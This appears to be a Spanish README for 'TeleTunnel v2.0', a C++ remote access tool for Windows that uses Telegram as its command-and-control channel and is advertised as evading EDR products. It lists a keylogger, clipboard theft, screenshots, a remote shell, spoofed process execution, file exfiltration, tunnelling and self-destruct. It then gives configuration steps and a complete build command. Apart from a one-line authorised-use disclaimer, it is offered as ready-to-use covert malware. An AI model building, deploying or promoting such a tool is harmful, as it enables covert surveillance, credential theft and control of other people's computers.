
Evadiendo EDR's con un bot sigiloso de c++ de Telegram y el propio Telegram como interfaz C2 !
Una herramienta de acceso remoto basada en Telegram para Windows.
Aviso: Solo para uso autorizado en sistemas que poseas. ¡Por favor 🙇
El bot tiene estas funciones:
ᴛᴇʟᴇᴛᴜɴɴᴇʟ ᴠ2.0
────────────────────
👤 Identidad: USUARIO@HOSTNAME
🛠 ʀᴇᴄᴏɴɴᴀɪssᴀɴᴄᴇ
├── sysinfo - Informe completo del sistema
├── ss - Captura de escritorio
├── ps - Listado de procesos
└── ls <ruta> - Explorador de directorios
⚡️ ᴄᴇɴᴛʀᴏ ᴅᴇ ᴄᴏᴍᴀɴᴅᴏs
├── > <cmd> - Shell nativo
├── spawn <PID> <cmd> - Ejecución suplantada
├── clip get/set - Gestor de portapapeles
└── kill - Autodestrucción
💾 ᴏᴘᴇʀᴀᴄɪᴏɴᴇs ᴄᴏɴ ᴀʀᴄʜɪᴠᴏs
├── get <ruta> - Descargar desde el host
├── [Arrastrar/Soltar]- Subir al host
└── drops - Listar subidas ($1, $LAST)
⌨️ ᴋᴇʏʟᴏɢɢᴇʀ
└── keylog <start|stop|dump|status>
📡 ᴛᴜɴᴇʟɪᴢᴀᴄɪóɴ
└── open|send|close|streams
────────────────────
nlohmann/json.hpp para análisis JSON. Está incluido en el repositorio, ahorrándote la molestia de buscarlo.Obtén un Token de Bot de Telegram:
@BotFather en Telegram y crea un nuevo bot.Obtén tu ID de Chat de Telegram:
@userinfobot para obtener tu ID de usuario exacto.https://api.telegram.org/bot<YOUR_BOT_TOKEN>/getUpdates para encontrar el id bajo chat.Configura el proyecto:
config.h."YOUR BOT TOKEN HERE" con tu token de bot real."XXXXXXXXXX" con tu ID de usuario de Telegram personal.Asegúrate de tener las bibliotecas necesarias de Windows: wininet, ws2_32, gdiplus, ole32 y iphlpapi.
Usando GCC/MinGW:
g++ -std=c++17 -O2 -mwindows -I. -Inlohmann "./TeleTunnel v2.cpp" -o TeleTunnelv2.exe -lwininet -lws2_32 -lgdiplus -lole32 -liphlpapi -static -static-libgcc -static-libstdc++